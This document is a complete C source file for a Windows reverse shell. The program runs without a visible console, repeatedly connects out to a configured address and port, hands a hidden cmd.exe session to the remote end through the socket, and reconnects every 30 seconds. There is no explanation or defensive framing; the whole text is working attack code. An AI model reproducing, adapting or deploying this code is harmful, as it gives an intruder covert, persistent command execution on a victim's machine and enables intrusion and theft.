#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #include <WinSock2.h> #include <windows.h>
#pragma comment(lib,"ws2_32")
const CHAR* REMOTE_ADDR = "127.0.0.1"; const DWORD REMOTE_PORT = 9999; const DWORD MAXSTR = 255;
void StartShell(SOCKET sSock) { STARTUPINFO si; PROCESS_INFORMATION pi; CHAR cmdline[MAXSTR] = { 0 };
GetStartupInfo(&si); si.cb = sizeof(STARTUPINFO); si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock; si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE;
GetSystemDirectory(cmdline, MAXSTR); strcat_s(cmdline, MAXSTR, "\\cmd.exe");
while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi)) { Sleep(1000); } WaitForSingleObject(pi.hProcess, INFINITE); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return; }
int main(int argc, char *argv[]) { SOCKADDR_IN sin; WSADATA wsd; SOCKET sSock; int cRet;
if (WSAStartup(MAKEWORD(2, 2), &wsd) == SOCKET_ERROR) { return 0; }
while (1) { if ((sSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) == INVALID_SOCKET) { return 0; }
sin.sin_family = AF_INET; sin.sin_addr.S_un.S_addr = inet_addr(REMOTE_ADDR); sin.sin_port = htons(REMOTE_PORT);
do { cRet = connect(sSock, (sockaddr*)&sin, sizeof(sin)); } while (cRet == SOCKET_ERROR); StartShell(sSock); closesocket(sSock); Sleep(30000); }
WSACleanup(); return 0; }
|